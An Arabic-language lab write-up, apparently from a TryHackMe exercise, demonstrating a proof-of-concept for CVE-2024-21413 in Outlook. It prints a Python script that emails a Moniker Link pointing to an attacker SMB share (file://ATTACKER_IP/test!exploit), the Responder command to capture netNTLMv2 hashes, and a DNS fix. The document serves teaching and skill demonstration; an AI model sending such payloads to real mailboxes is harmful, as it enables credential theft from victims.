
استغلال إثبات المفهوم لـ CVE-2024-21413 باستخدام Moniker Link في بريد HTML لبدء اتصال SMB والتقاط تجزئات netNTLMv2 عبر Responder. يوضح مهارات اختبار الاختراق وبرمجة Python وتحليل بروتوكولات الشبكة.
نظرة عامة: إثبات مفهوم عملي يوضح استخدام ارتباط Moniker Link في بريد HTML لتحفيز اتصال SMB من Outlook، مما يسمح بالتقاط تجزئة netNTLMv2 الخاصة بالضحية عبر Responder. يعرض ذلك مهارات عملية في اختبار الاختراق، والبرمجة النصية، وتحليل بروتوكولات الشبكة.
file://) يشير إلى مشاركة SMB الخاصة بالمهاجم.# exploit.py (trimmed)
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.utils import formataddr
sender = '[email protected]'
receiver = '[email protected]'
mailserver = '10.201.52.124' # THM SMTP server
password = input('Enter attacker email password: ')
html = '<p><a href="file://ATTACKER_IP/test!exploit">Click me</a></p>'
msg = MIMEMultipart()
msg['Subject'] = 'CVE-2024-21413'
msg['From'] = formataddr(('CMNatic', sender))
msg['To'] = receiver
msg.attach(MIMEText(html, 'html'))
with smtplib.SMTP(mailserver, 25) as s:
s.ehlo()
s.login(sender, password)
s.sendmail(sender, [receiver], msg.as_string())
print('Email delivered')
نصيحة: استبدل ATTACKER_IP وmailserver قبل التشغيل. في مختبر TryHackMe، كلمة المرور هي attacker.
responder -I ens5
استبدل ens5 باسم واجهة الشبكة لديك.
/etc/resolv.conf وإصلاحهاأحيانًا يفشل Responder بسبب روابط رمزية معطلة في /etc/resolv.conf. أصلح ذلك باستخدام:
rm -f /etc/resolv.conf
printf "nameserver 8.8.8.8
nameserver 1.1.1.1
" > /etc/resolv.conf
chmod 644 /etc/resolv.conf
cat /etc/resolv.conf
المهارات المُبرَزة: استكشاف أخطاء Linux وإصلاحها، وإعداد DNS، وتكييف الأدوات مع بيئات السحابة/الآلات الافتراضية.
خطأ / مشكلة Resolv.conf:`

تم تطبيق إصلاح DNS:

سكربت البريد الإلكتروني بلغة Python:

تسليم الاستغلال:

صندوق وارد الضحية:

تجزئة الضحية الملتقطة:

مقتبس من مختبر TryHackMe MonikerLink ومن إثبات المفهوم الأصلي لـ CMNatic (GitHub)